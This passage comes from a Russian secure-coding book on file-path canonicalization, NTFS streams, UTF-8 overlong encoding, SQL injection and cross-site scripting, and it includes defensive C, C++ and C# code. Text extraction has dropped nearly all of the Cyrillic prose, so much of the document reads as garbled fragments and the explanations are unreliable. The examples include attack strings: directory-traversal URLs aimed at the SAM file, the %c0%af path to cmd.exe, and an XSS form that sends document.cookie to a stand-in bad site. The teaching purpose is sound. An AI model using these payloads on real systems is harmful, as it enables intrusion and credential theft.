Crucial ADS Crucial Security (http://www.crucialsecurity.com)
Security Expressions Pedestal Software (http://www.pedestalsoft
ware.com).
,
, ,
. ,
(access control list, ACL)
ACL .
, (.) (\),
, .
Win32,
, ,
. ,
Web, 17. ,
, (. Secureco2\Chapter11\Trai
lingDot):
#include <strsafe.h>
char b[20];
StringcbCopy(b, sizeof(b), "Hello!");
HANDLE h = CreateFile("c:\\somefile.txt",
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (h != INVALID_HANDLE_VALUE) {
DWORD dwNum = 0;
WriteFile(h, b, lstrlen(b), &dwNum, NULL);
CloseHandle(h);
}
h = CreateFile("c:\\somefile.txt.", // .
GENERIC_READ,
0, NULL,
OPEN_EXISTING,
318
II
FILE_ATTRIBUTE_NORMAL,
NULL);
if (h != INVALID_HANDLE_VALUE) {
char b[20];
DWORD dwNum =0;
ReadFile(h, b, sizeof b, &dwNum, NULL);
CloseHandle(h);
}
?
CreateFile somefile.txt
, somefile.txt
. ,
! , somefile.txt. somefile.txt ,
.
\\?\
( ANSI)
MAX_PATH (260). Unicode
32 000 Unicode,
\\?\. .
260 .
\\?\c:\temp\myfile.txt , c:\temp\myfile.txt.
\\?\, .
(..)
, , Web FTP
, .
,
.
.
, c:\datafiles. ,
. , ..\boot.ini,
(
) , , . .\winnt\repair\sam,
(Security Account Manager, SAM)
.
( , Windows 2000
Active Directory, SAM.)
, L0phtCrack ( http://www.atsta
ke.com), .
!
11
319
?
c:\dir\foo\files\secret
c:\dir\foo\myfile.txt:
c:\dir\foo\files\secret\..\..\myfile.txt;
c:\dir\foo\files\..\myfile.txt;
c:\dir\..\dir\foo\files\..\myfile.txt.
!
, , ?
? , PATH?
. ,
File.exe File.exe:
, PATH?
,
Windows, .
NTFS ,
. MyFile.txt myfile.txt .
:
POSIX (Portable Operating System Interface for UNIX).
,
, Apple Mac OS X Web Apache.
UNC
(Universal Naming Convention, UNC). UNC
Windows
. UNC
.
BlakeLaptop Files,
c:\My Documents\Files. Z:
, net use z: \\BlakeLaptop\Files. z:\my
file.txt c:\My Documents\Files\myfile.txt .
UNC ,
. , \\BlakeLaptop\Files\myfile.txt z:\myfile.txt. UNC
\\?\, \\?\UNC\BlakeLaptop\Files
\\BlakeLaptop\Files.
320
II
:
API ( CreateFile)
, (named pipe) (mailslot).
,
.
(fireandforget).
(
), , ,
, . : \\<_
>\pipe\<_>, :
\\<_>\mail
slot\<_>\.
:
Windows
. , COM1
, AUX , LPT2
..
: CON, PRN, AUX, CLOCK$, NUL, COM1 COM9,
LPT1 LPT9. ,
NUL.txt, .
: . ,
C:\Program Files\COM1 , d:\North
WindTraders\COM1.
, ,
, ,
, . ,
.
\documents\com1, .
, ! ,
, .
, ,
,
, .
Web.
11
321
, ,
Windows. , Linux
, , /dev/
mouse, /dev/console, /dev/tty0, /dev/zero .
, Mandrake
Linux 7.1 Netscape 4.73, , file:///
dev/mouse
. , file:///dev/zero
.
, Web <IMG
SRC=file:///dev/mouse>.
,
.
Web
, ,
URL . ,
, . , .
AOL
America Online (AOL) 5.0 ,
Web
. URL ,
Web ,
. : ,
. , ,
, Web ( )
URL.
(. http://www.slashdot.org/features/00/07/15/
0327239.shtml).
eEye
, SecureIIS,
Internet Information Services (IIS).
eEye (http://www.eeye.com) SecureIIS:
SecureIIS Web Microsoft Internet Information Services
. SecureIIS IIS
Web
.
322
II
SecureIIS .
. ,
, ( )
, URL
action=delete. SecureIIS,
. , action=de
lete action=%64elete . %64
d.
Web
. , ,
URL, : http://www.northwindtraders.com/scripts/process.asp?fi
le=../../../winnt/repair/sam (
SAM). (..) (/), SecureIIS
. SecureIIS ,
: http://www.northwindtraders.com/scripts/process.asp?file=%2e%2e/%2e%2e/%2e
%2e/winnt/repair/sam. , , , %2e
!
Web http://www.security focus.com/
bid/2742.
11
323
, ::$DATA
Internet Information Server 4.0
, IIS,
. . NTFS,
Windows NT ,
, Apple Macintosh HFS,
, (fork), :
(data fork) (resource fork). (
Web http://support.microsoft.com/default.aspx?scid=kb;enus;Q147438.).
NTFS ,
. , ( Secureco2\Chap
ter11\NTFSStream) test Bar.txt (
bar.txt:test):
324
II
.
, NTFS
$DATA. ,
NTFS, :
boot.ini::$DATA
. 111.
NTFS
NTFS , NTFS,
. , , 16 now john3 readme
john3:16 readme:now.
.
.
IIS . ,
.asp, ASP (Active Server Pages),
Asp.dll. IIS ,
Windows, ,
.
, default
switch. , Data.txt,
, .txt,
.
, Default.asp::$DATA.
, IIS .asp::$DATA
. NTFS, ,
,
Default.asp. http://
www.microsoft.com/technet/security/bulletin/MS98003.asp.
/ .
, file.txt.
IP , ,
:
172.23.11.19 Mike
2002!09!03
13:02:43 file.txt
file.txt\r\n127.0.0.1\tCheryl\t20020903\t13:03:00\tsec
retfile.txt, :
11
172.23.11.19
Mike
2002!09!03
13:02:43 file.txt
127.0.0.1
Cheryl
2002!09!03
13:03:00 secretfile.txt
325
, Cheryl , (127.0.0.1)
? , .
,
!
http://online.securityfocus.com/
archive/82/271498/20020509/20020515/2.
Web
Web
. , URL Web
:
7 8 ASCII;
;
UTF8 ;
Unicode UCS2;
;
HTML ( Web, URL).
7- 8- ASCII-
, .
, .
,
, .
, %20, ( )
%A3. URL, http:/
/www.northwindtraders.com/my%20document.doc http://www.northwindtraders.com/
my%20document%2Edoc my document.doc,
Northwind Traders.
SecureIIS eEye. ,
.
, SecureIIS ,
.
UTF-8
RFC 2279 (http://www.ietf.org/rfc/rfc2279.txt) Unicode
8 (Eightbit Unicode Transformation Format, UTF8).
UTF8
, , 2 (UCS2) 4 (UCS4) Unicode
326
II
ASCII. ,
, .
UTF-8
UTF8 n ,
. , 7
ASCII (0x00 0x7F) 01100001, 0
, 0, 1100001 7 ,
ASCII. , H,
0x48 1001000 , UTF8 01001000
0x48. , 7 ASCII UTF8 .
, , 7
ASCII, Unicode, 0x7FFFFFFF.
, 0x80 0x7FF 110xxxxx 10xxxxxx,
110 10 , x
. , 0xA3
10100011 . UTF8
11000010 10100011 : 0xC2 0xA3.
. UTF8
(. 111).
11-1.
UTF-8
0x000000000x0000007F
0xxxxxxx
0x000000800x000007FF
110xxxxx 10xxxxxx
0x000008000x0000FFFF
0x000100000x001FFFFF
0x002000000x03FFFFFF
0x040000000x7FFFFFFF
:
, UTF8
. UTF8
. ,
(?) 0x3F 00111111
. ,
, :
0xC0 0xBF
0xE0 0x80 0xBF
0xF0 0x80 0x80 0xBF
0xF8 0x80 0x80 0x80 0xBF
0xFC 0x80 0x80 0x80 0x80 0xBF
UTF8 ,
, 0x3F.
11
327
, , UTF8,
IIS 4 IIS 5 .
%c0%af URL
, : http://servername/scripts/..%c0%af../winnt/sys
tem32/cmd.exe. , %c0%af? 11000000
10101111, UTF8, . 81,
11000000 10101111. , 00000101111
0x2F, , (/)! UTF8
(overlong sequence).
, URL, http://<_
>/scripts/../../winnt/system32/cmd.exe. ,
scripts, ,
, system32,
Cmd.exe.
Web http://www.micro
soft.com/technet/security/bulletin/MS00057.asp.
Unicode UCS-2
UCS2
UTF8. UCS2 (Universal Character
Set) , ASCII
, %uNNNN, NNNN
Unicode. , %5C UTF8 ASCII (\),
%u005C , 2 Unicode.
, , %u005C
Unicode, (fullwidth)
. Unicode
.
%uFF00 %uFFEF
%20 %7E. , \
%u005C %uFF3C.
,
, ,
, .
, UTF8 (%5c) : %,
5 c, , UTF8: %25, %35
%63. . 112
(\).
,
,
. ,
, .
328
II
11-2.
%5c
UTF8
%255c
%25 %, 5 c
%%35%63
%, %35 5 %63 c
%25%35%63
%, 5, c UTF8
HTML
HTML ,
. , (< >) < >
£. !
,
. , < , C; (
<) < ( <).
http://
www.w3.org/TR/REChtml40/sgml/entities.html.
, Web , ,
,
.
.
2002 (Alex
Gontmakher), The Homograph
Attack ( ) (http://www.cs.technion.ac.il/~gabr/pubs.html).
,
, (. 112).
. 112. localhost, ? .
localhost ,
ASCII o
11
329
, localhost
o, (U+043E),
, . ,
,
. , ,
: a, c, e, p, y, x, H, T M.
/ (U+2044) / (U+002F). ,
. Unicode ,
14.
(0)
O.
, , URL
,
. , ,
localhost, 1ocalhost?
, ,
, .
: ,
.
.
, ,
.
(ACL)
. , , !
. , IIS ,
, ASP VBScript
Microsoft JScript, ,
. , , .
IIS, , , .
IIS, ::$DATA,
, IIS .
, IP
.
, ,
IP, DNS ,
.
! , ,
.
.
330
II
10, .
, , ,
. , ,
. :
:
C D;
;
, 32 ,
txt, jpg gif.
.
.
, , .
(
10):
^[cd]:(?:\\\w+)+\\\w{1,32}\.(txt|jpg|gif)$
:
c:\mydir\myotherdir\myfile.txt;
d:\mydir\myotherdir\someotherdir\picture.jpg.
:
e:\mydir\myotherdir\myfile.txt ( );
c:\fred.txt ( );
c:\mydir\myotherdir\..\mydir\myfile.txt ( ,
AZaz09 );
c:\mydir\myotherdir\fdisk.exe ( );
c:\mydir\myothe~1\myfile.txt ( );
c:\mydir\myfile.txt::$DATA ( ,
$ );
c:\mydir\myfile.txt. ( );
\\myserver\myshare\myfile.txt ( );
\\?\c:\mydir\myfile.txt ( ).
,
. :
, , .
11
331
! ,
.
.
:
, .
. .
: , ,
.
8.3
.
, .
8.3,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
:
NtfsDisable8dot3NameCreation : REG_DWORD : 1
: .
PATH
PATH .
, . ,
PATH,
c:\myhacktools, %systemroot% !
PATH ? :
,
.
Windows XP
:
, PATH.
,
. : HKEY_LOCAL_MACHINE\Sys
tem\CurrentControlSet\Control\Session Manager\SafeDllSearchMode.
: DWORD, 0.
1 system32.
,
.
, .
332
II
, ,
Win32.
,
, .
,
,
. , CleanCanon ,
.
1. , mysecretfile.txt.
2. . , mysecretfile.txt ,
mysecr~1.txt, mysecretfile.txt::$DATA mysecretfile.txt. ( )
.
3. ,
MAX_PATH, .
DoS .
4. (
) c:\myfiles , c:\myfi
les\mysecretfile.txt. \\?\ ,
,
.
5. GetFullPathName
(..).
6. GetLongPathName ,
. , mysecr~1.txt mysec
retfile.txt. ,
2. !
7. , .
. GetFileType ,
FILE_TYPE_DISK, ,
.
, Linux
UNIX. , ,
C C++ stat
stat.st_mode S_IFREG (0x0100000),
, .
CleanCanon, Visual C++ .NET
Win32:
/*
CleanCanon.cpp
*/
#include "stdafx.h"
#include "atlrx.h"
#include "strsafe.h"
11
#include <new>
enum errCanon {
ERR_CANON_NO_ERROR = 0,
ERR_CANON_INVALID_FILENAME,
ERR_CANON_INVALID_PATH,
ERR_CANON_NOT_A_FILE,
ERR_CANON_NO_FILE,
ERR_CANON_NO_PATH,
ERR_CANON_TOO_BIG,
ERR_CANON_NO_MEM};
errCanon GetCanonicalFileName(LPCTSTR szFilename,
LPCTSTR szDir,
LPTSTR *pszNewFilename) {
//
//
//
if
(szDir
return
,
MAX_PATH
== NULL)
ERR_CANON_NO_PATH;
size_t cchDirLen = 0;
if (StringCchLength(szDir,MAX_PATH,&cchDirLen) != S_OK ||
cchDirLen > MAX_PATH)
return ERR_CANON_TOO_BIG;
*pszNewFilename = NULL;
LPTSTR szTempFullDir = NULL;
HANDLE hFile = NULL;
errCanon err = ERR_CANON_NO_ERROR;
try {
// 2
// (! ,
// 1!4 ! ).
// ( ! '\').
// .
CAtlRegExp<> reFilename, reDirname;
CAtlREMatchContext<> mc;
reFilename.Parse(_T("^\\a+\\.\\a\\a?\\a?\\a?$"),FALSE);
if (!reFilename.Match(szFilename,&mc))
throw ERR_CANON_INVALID_FILENAME;
reDirname.Parse(_T("^\\c:\\\\[a!z0!9\\\\]+$"),FALSE);
if (!reDirname.Match(szDir,&mc))
throw ERR_CANON_INVALID_FILENAME;
size_t cFilename = lstrlen(szFilename);
size_t cDir = lstrlen(szDir);
333
334
II
//
// " " (\).
size_t cNewFilename = cFilename + cDir + 1;
// 3
// , MAX_PATH .
if (cNewFilename > MAX_PATH)
throw ERR_CANON_TOO_BIG;
// .
// '\\?\' '\0'.
LPCTSTR szPrefix = _T("\\\\?\\");
size_t cchPrefix = lstrlen(szPrefix);
size_t cchTempFullDir = cNewFilename + 1 + cchPrefix;
szTempFullDir = new TCHAR[cchTempFullDir];
if (szTempFullDir == NULL)
throw ERR_CANON_NO_MEM;
//
//
//
//
//
if
4
.
\\?\, ,
.
(StringCchPrintf(szTempFullDir,
cchTempFullDir,
_T("%s%s\\%s"),
szPrefix,
szDir,
szFilename) != S_OK)
throw ERR_CANON_INVALID_FILENAME;
// 5
// ,
// (..), .
TCHAR szFullPathName [MAX_PATH + 1];
LPTSTR szFilenamePortion = NULL;
DWORD dwFullPathLen =
GetFullPathName(szTempFullDir,
MAX_PATH,
szFullPathName,
&szFilenamePortion);
if (dwFullPathLen > MAX_PATH)
throw ERR_CANON_NO_MEM;
// 6
//
if (GetLongPathName(szFullPathName,
szFullPathName,
MAX_PATH) == 0) {
errCanon errName = ERR_CANON_TOO_BIG;
switch (GetLastError()) {
case ERROR_FILE_NOT_FOUND :
11
335
errName = ERR_CANON_NO_FILE;
break;
case ERROR_NOT_READY :
case ERROR_PATH_NOT_FOUND :
errName = ERR_CANON_NO_PATH;
break;
default : break;
}
throw errName;
}
// 7
// ?
hFile = CreateFile(szFullPathName,
0,0,NULL,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
NULL);
if (hFile == INVALID_HANDLE_VALUE)
throw ERR_CANON_NO_FILE;
if (GetFileType(hFile) != FILE_TYPE_DISK)
throw ERR_CANON_NOT_A_FILE;
// , !
// ,
// (pszNewFilename).
const size_t cNewFilenane = lstrlen(szFullPathName)+1;
*pszNewFilename = new TCHAR[cNewFilenane];
if (*pszNewFilename != NULL)
StringCchCopy(*pszNewFilename,cNewFilenane,szFullPathName);
else
err = ERR_CANON_NO_MEM;
} catch(errCanon e) {
err = e;
} catch (std::bad_alloc a) {
err = ERR_CANON_NO_MEM;
}
delete [] szTempFullDir;
if (hFile) CloseHandle(hFile);
return err;
}
Secureco2\Chapter11\CleanCanon. Create
File : , , ,
, .
336
II
CreateFile
, , , dwFlags
AndAttributes . .
,
,
. . , , ,
. ,
, , ,
.
,
, . ,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
, FILE_FLAG_OPEN_NO_RECALL, ,
, .
(Hierarchical Storage Manage
ment) .
Web.
Web
,
, ,
.
.
,
. : .
: , ,
, .
, ,
, !
UTF-8
UTF8,
Windows MultiByteToWideChar.
,
UTF8. Secure
co2\Chapter11\UTF8. , UTF8 ,
WideCharToMultiByte, CP_UTF8.
11
337
void main() {
// Unicode! 0x5c;
// (\).
BYTE pUTF8_1[] = {0x5C};
DWORD cbUTF8_1 = sizeof pUTF8_1;
FromUTF8(pUTF8_1, cbUTF8_1);
// Unicode! 0xC0 0xAF.
// .
// (/).
BYTE pUTF8_2[] = {0xC0, 0xAF};
DWORD cbUTF8_2 = sizeof pUTF8_2;
FromUTF8(pUTF8_2, cbUTF8_2);
// Unicode! 0xC2 0xA9;
// ().
BYTE pUTF8_3[] = {0xC2, 0xA9};
DWORD cbUTF8_3 = sizeof pUTF8_3;
FromUTF8(pUTF8_3, cbUTF8_3);
}
ISAPI
ISAPI , , ,
C C++, Web
. IIS 6
SCRIPT_TRANSLATED,
URL, (, , ).
338
II
:
,
,
,
.
, .
, .
, Web, ,
, .
DNS, northwindtraders.com. IP,
192.168.197.100. .
localhost, IP
127.n.n.n. Windows NetBIOS,
\\northwindtraders.
, ,
?
,
. ( Secure
co2\Chapter11\CanonServer)
.
/*
CanonServer.cpp
*/
for (int i = ComputerNameNetBIOS;
i <= ComputerNamePhysicalDnsFullyQualified;
i++) {
TCHAR szName[256];
DWORD dwLen = sizeof szName / sizeof TCHAR;
TCHAR *cnf;
switch(i) {
case 0 : cnf = "ComputerNameNetBIOS"; break;
case 1 : cnf = "ComputerNameDnsHostname"; break ;
case 2 : cnf = "ComputerNameDnsDomain"; break;
case 3 : cnf = "ComputerNameDnsFullyQualified"; break;
case 4 : cnf = "ComputerNamePhysicalNetBIOS"; break;
case 5 : cnf = "ComputerNamePhysicalDnsHostname "; break;
case 6 : cnf = "ComputerNamePhysicalDnsDomain"; break;
case 7 : cnf = "ComputerNamePhysicalDnsFullyQualified"; break;
default : cnf = "Unknown"; break;
}
BOOL fRet =
GetComputerNameEx((COMPUTER_NAME_FORMAT)i,
11
339
szName,
&dwLen);
if (fRet) {
printf("%s '%s' .\n", szName, cnf);
} else {
printf(" %d", GetLastError());
}
}
IP ( ) getaddrinfo
Windows Sockets (Winsock) Perl.
, :
, Windows
: <>\<_>. SAM.
, DEVELOPMENT\Blake Blake DEVE
LOPMENT. Windows 2000
(user principal name, UPN),
: <_>@<>, blake@deve
lopment.northwindtraders.com.
:
340
II
Windows 2000
SAM. SAM,
, : Win
dows NT 4, Windows 2000, Windows 2000 Active Directory Windows XP.
GetUserNameEx, (. Secureco2\Chapter11\Canon
User):
/*
CanonUser.cpp
*/
#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
for (int i = NameUnknown ;
i <= NameServicePrincipal;
i++) {
TCHAR szName[256];
DWORD dwLen = sizeof szName / sizeof TCHAR;
TCHAR *enf = NULL;
switch(i) {
case 0 : enf = "NameUnknown"; break;
case 1 : enf = "NameFullyQualifiedDN"; break;
case 2 : enf = "NameSamCompatible"; break;
case 3 : enf = "NameDisplay"; break;
case 4 : enf = "NameUniqueId"; break;
case 5 : enf = "NameCanonical"; break;
case 6 : enf = "NameUserPrincipal"; break;
case 7 : enf = "NameUserPrincipal"; break;
case 8 : enf = "NameServicePrincipal"; break;
default : enf = "Unknown"; break;
}
BOOL fRet =
GetUserNameEx((EXTENDED_NAME_FORMAT)i,
szName,
&dwLen);
if (fRet) {
printf("%s '%s' .\n", szName, enf);
} else {
printf("%s %d\n", enf, GetLastError());
}
}
, :
.
11
341
,
. , ACL.
:
, ,
. , .
, :
,
, .
,
.
, !
12
Web
(). , Web XML Web
, ,
.
, Web, . ( 13
Web,
, .)
SQL;
.
2001 . Microsoft Professional Developers Con
ference ( Microsoft)
.
Web .
, 15 .
,
, , .
SQL, ,
, .
,
,
.
, , .
: ,
, .
, ,
,
.
12
343
,
: , ,
,
. .
, (
, ):
string sql = "select * from client where name = '" + name + "'"
name . ,
name SQL. ,
Blake, SQL:
Creditcard*
CustomerID
CreditCardID
CreditCardID
Type
Number
Expires
Customer*
CustomerID
LastName
FirstName
MiddleInitial
Address
Apartment
City
State
PostalCode
Country
. 121. ,
344
II
. ,
,
SQL. , SQL,
,
, .
,
Microsoft SQL Server, IBM DB2, Oracle, PostgreSQL MySql.
, SQL (SQL injection).
SQL,
, or.
SQL,
, .
SQL . ,
SQL Server :
12
345
{
failed\n\r";
se.Errors) {
+ "\n\r";
C#? : SQL
,
SQL. . Web
sa, (sysadmin)
SQL Server.
: sa SQL Server , SYSTEM Windows NT
.
. sa Oracle
internal.
sa. :
! , .
: SQL
,
, SQL. ,
, ,
.
, .
1:
,
, . ,
.
346
II
, ,
SQL:
2:
, ,
, SQL. !
, .
, sp_GetName:
12
347
, ,
, :
1:
SQL Server
(sysadmin)
Web Web. ,
.
Web
.
Web
,
.
SQL , ,
SQL, ,
, :
;
;
;
, ;
;
;
.
.
. Trusted_Connection=True.
( )
,
,
.
,
.
348
II
,
. , SQL Server xp_cmdshell,
. Oracle
utl_file,
.
sysadmin
.
. ,
. ,
!
, SQL.
, .
2:
SQL-
SQL ,
, .
SQL
. (place
holder), (parameterized
command). , SQL
. :
12
349
cmd.Prepared = true
' :
' 200 (varchar, );
' 1 ( );
' ! 32 .
Set parm1 = cmd.CreateParameter("name", 200, 1, 32, "")
cmd.Parameters.Append parm1
parm1.Value = strName
Set parm2 = cmd.CreateParameter("pwd", 200, 1, 32, "")
cmd.Parameters.Append parm2
parm2.Value = strPwd
Set rs = cmd.Execute
IsValidUserAndPwd = false
If rs(0).value = 1 Then IsValidUserAndPwd = true
rs.Close
cn.Close
End Function
, ,
SQL. ,
: , !
. , ,
SQL,
, .
ODBC , SQLNumParams
SQLBindParam. OLE DB ICommandWith
Parameters. , SqlCommand.
, Web.
.
, .
, quotename. ,
select top 3 name from mytable select top 3 [name] from
[mytable], name mytable. quotename
TransactSQL ( .
SQL Server Books Online). ,
. ,
SQL Query Analyzer .
, ASCII,
.
350
II
declare @a varchar(20)
set @a=0x74735D27
select @a
set @a=quotename(@a)
select @a
set @a='ts]'''
select @a
set @a=quotename(@a)
select @a
@a (ts] ).
, [ ].
, sp_executesql
SQL, .
:
!! .
declare @name varchar(64)
set @name = N'White'
!! .
exec sp_executesql
N'select au_id from pubs.dbo.authors where au_lname=@lname',
N'@lname varchar(64)',
@lname = @name
SQL Server, ,
, ,
. ,
! :
, , .
,
,
( ). Web C#
: , ,
.
//
// SafeQuery
//
using
using
using
using
using
using
System;
System.Data;
System.Data.SqlTypes;
System.Data.SqlClient;
System.Security.Principal;
System.Security.Permissions;
12
using
using
using
using
System.Text.RegularExpressions;
System.Threading;
System.Web;
Microsoft.Win32;
[SqlClientPermissionAttribute(SecurityAction.PermitOnly,
AllowBlankPassword=false)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\Client")]
static string GetName(string Id)
{
SqlCommand cmd = null;
string Status = "Name Unknown";
try {
// (ID).
Regex r = new Regex(@"^\d{4,10}$");
if (!r.Match(Id).Success)
throw new Exception(" ID");
// .
SqlConnection sqlConn= new SqlConnection(ConnectionString);
// ID!.
string str="sp_GetName";
cmd = new SqlCommand(str,sqlConn);
cmd.CommandType = CommandType.StoredProcedure;
cmd.Parameters.Add("@ID",Convert.ToInt64(Id));
cmd.Connection.Open();
Status = cmd.ExecuteScalar().ToString();
} catch (Exception e) {
if (HttpContext.Current.Request.UserHostAddress == "127.0.0.1")
Status = e.ToString();
else
Status = " ";
} finally {
// .
if (cmd != null)
cmd.Connection.Close();
}
return Status;
}
// .
internal static string ConnectionString {
351
352
II
get {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\Client\")
.GetValue("ConnectionString");
}
}
.
,
.
; .
: 4 10 , .
.
, Web
(, ).
, .
,
sa. ,
,
.
, .
64
( ).
.
, .
, . ,
, .
.
, ,
(ID) 4 10 .
^\d{4,10}$, 4 10
(\d{4,10}) (^) ($) .
,
: SQL
.
System.Text.RegularExpressions.
. ,
, SqlConnection, .
ConnectionString. ,
Web
.
12
353
data source=db007a;
user id=readuser;
password=&ugv4!26dfA!+8;
initial catalog=client
: db007a.
Web,
SQL.
sa, ,
readuser ( ) ,
SQL
client. Web
, master ,
, .
SQL
. ,
,
,
.
, ( , )
, Web.
, Web,
, ! ,
:
AppDomain.CurrentDomain.SetPrincipalPolicy
(PrincipalPolicy.WindowsPrincipal);
WindowsPrincipal user = (WindowsPrincipal)Thread.CurrentPrincipal;
if (user.IsInRole(WindowsBuiltInRole.Administrator)) {
// ,
// .
}
, finally. try/catch
, ,
,
.
.
, .NET Framework
.
. ,
SQLClientPermissionAttribute, SQL Server .NET Data Provider
,
354
II
AllowBlankPassword false, .
SQL Server
.
, RegistryPermissionAttribute, (
) (, ..). ,
Read @"HKEY_LOCAL_MACHINE\SOFTWARE\Shipping",
,
. ,
.
,
, .
,
.
, ,
, , ,
SQL. ,
.
, !
,
. , , .
.
,
.
, .
, .
13
Web-
, ,
Web. , ,
Web . , 10
11, Web ,
12.
Web
. , Web,
, , . ,
, ,
. , : ,
, .
( ,
) HTTP, ,
SSL (Secure Sockets Layer) TLS (Transport
Layer Security). , !
- :
, (crosssite scripting, XSS)
. ,
:
Web. ,
356
II
Web
. ?
:
Web , ;
Web ,
.
, :
Hello,
<%
Response.Write(Request.Querystring("name"))
%>
, name QueryString,
www.contoso.com/req.asp?name=Blake.
, , ,
, Web,
? , , , ,
, :
<a href=www.contoso.com/req.asp?name=scriptcode>
$1 000 000</a>
scriptcode :
<script>x=document.cookie;alert(x);</script>
, , ,
. , :
<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69
%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C
%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B
%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E">
$1 000 000</a>
, www.microsoft.com, !
, URL: http://
< >:<>@<Web>. RFC 1738, Uniform
Resource Locators (URL) (ftp://ftp.isi.edu/innotes/rfc1738.txt).
3.1. Common Internet Scheme Syntax ( ):
URL
, URL,
IP
, : //<>:<
>@<>:<>/<url>.
: URL .
URL: www.microsoft.com . ,
, Web,
, ,
!
13 Web-
357
, ( XSS). name
, , HTML JavaScript,
, cookie, docu
ment.cookie. , cookie . ,
cookie, contoso.com, Web
, Web microsoft.com.
: ,
? , ,
, contoso.com,
cookie contoso.com. ,
, ,
, .
cookie
. ,
, .
. 2001 . Web
passport.com ,
. Hotmail
, passport.com,
Hotmail hotmail.passport.com. ,
cookie, Passport
. cookie
HTTP,
.
cookie.
(poisoning). (plugin)
(native) , (,
ActiveX SiteLock, 16),
,
. ,
.
(spoofing) . ,
XSS. ,
. ,
(. 131).
XSS
.
3.
Web
. , ,
. , Dynamic
HTML (DHTML) ,
.
.
358
II
<a href=http://www.contoso.com/req.asp?name=
<FORM action=http://www.badsite!sample!13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
!
</a>
, HTML
. , .
cookie Web.
!
SSL/TLS .
XSS.
,
(
). ,
,
,
. , , Web,
Web. (
querystring.)
, ,
.
Web-
Web-
Web-
. 131.
XSS
Web-
,
(/ )
13 Web-
359
cookie XSS , ,
cookie, . ,
cookie , ,
, . ,
cookie.
XSS CrossSite Scripting
Overview ( ) (http://
www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp).
Open Web Appli
cation Security Project (http://www.owasp.org).
<SCRIPT>
.
<script>,
Web.
.
, <img src> <a href>
, URL. , ,
:
, : ,
, . ,
.
,
HTML. ,
:
http://www.microsoft.com onmouseover="malicious!script"
onmouseover HTML.
,
. ,
onload onactivate.
. ?
360
II
, XSS
XSS: , HTML
, , Windows (CHM
), HTML. .
XSS-
XSS Web, ,
.
XSS HTML .
,
, ,
.
. ,
CLYBG5EV, KDEJ41EB, ONWN
WXYR, W5U7GT63 ( CryptGenRandom).
. HTML
, ,
, .
, HTML
URL .
: localxss.html c:\webfiles:
<html>
<head>
<title> XSS!</title>
</head>
<body>
!
<script>document.write(location.hash)</script>
</body>
</html>
Web ,
(#) URL.
!:
file://C:\webfiles\localxss.html#<script>alert('!');</script>
, .
My Computer ( ). (Microsoft Internet Explorer
, .)
, , Internet (
), ,
My Computer.
Internet Explorer, .
location.search location.href.
13 Web-
361
, ,
Internet Explorer ,
. Internet Explorer 6 SP1,
Microsoft Windows XP SP1 Microsoft Windows .NET Server 2003
,
Internet My Computer.
. 131: Web
Web , !
Internet Explorer 4
.
, .
Web.
, Web
, . ,
.
, ,
Web.
,
.
,
,
. Internet Explorer : (
): My Computer ( ), Trusted Sites ( ), Local
Intranet ( ), Internet () Restricted Sites (
).
HTML-
HTML , , .
Internet Explorer res:,
( , HTML) DLL
, EXE . , res://mydll.dll/#23/
ERROR HTML ( #23) ERROR
362
II
XSS-
, ,
XSS ,
. ( ?)
,
. ,
. XSS
SQL
,
.
(
):
;
;
innerText;
;
HttpOnly cookie Internet Explorer 6 SP1;
Internet Explorer;
<FRAME SECURITY> Internet Explorer;
ValidateRequest ASP.NET 1.1.
( )
, , ,
,
. .
. ,
Server. HTMLEncode ASP HttpServerUtility. HTML
Encode ASP.NET. ,
HTML, , <
<.
13 Web-
363
HTML, ,
. , www.contoso.com/product.asp?id=210502
ASP:
<a href=http://www.contoso.com/detail.asp?id=2105>
, id,
<a> <script>.
id : 2105><script event=onload>exploitcode
</script>.
<a>,
. , 2105 onclick="exploitcode" <a>,
onclick, , exploit.
,
, , :
<a href="http://www.contoso.com/
detail.asp?id=<%= Server.HTMLEncode (request.querystring("id")) %>">
,
href. id,
, detail.asp
id, , id. , 2105
onclick=exploitcode :
innerText
innerText ,
,
. :
<html>
<body>
<span id=spnTest></span>
</body>
</html>
<script for=window event=onload>
spnTest.innerText = location.hash;
</script>
364
II
HTML URL, ,
, .
file://C:\webfiles/xss.html#<script>alert(1);</script>
innerHTML
. !
Web
, .
, , <meta>,
Web
:
HttpOnly cookie-
Internet Explorer 6 SP1
Windows Security Push ,
Internet Explorer, XSS, cookie
, cookie
HttpOnly. , cookie DHTML
Internet Explorer 6 SP1:
13 Web-
365
// ISAPI! "HttpOnly"
DWORD WINAPI HttpFilterProc(
PHTTP_FILTER_CONTEXT pfc,
DWORD dwNotificationType,
LPVOID pvNotification) {
// cookie! ! 2k
CHAR szCookie[2048];
DWORD cbCookieOriginal = sizeof(szCookie) / sizeof(szCookie[0]);
DWORD cbCookie = cbCookieOriginal;
HTTP_FILTER_SEND_RESPONSE *pResponse =
(HTTP_FILTER_SEND_RESPONSE*)pvNotification;
CHAR *szHeader = "Set!Cookie:";
CHAR *szHttpOnly = "; HttpOnly";
if (pResponse!>GetHeader(pfc,szHeader,szCookie,&cbCookie)) {
if (SUCCEEDED(StringCchCat(szCookie,
cbCookieOriginal,
szHttpOnly))) {
if (!pResponse!>SetHeader(pfc,
szHeader,
szCookie)) {
// cookie!!
pResponse!>SetHeader(pfc,szHeader,"");
}
} else {
pResponse!>SetHeader(pfc,szHeader,"");
}
}
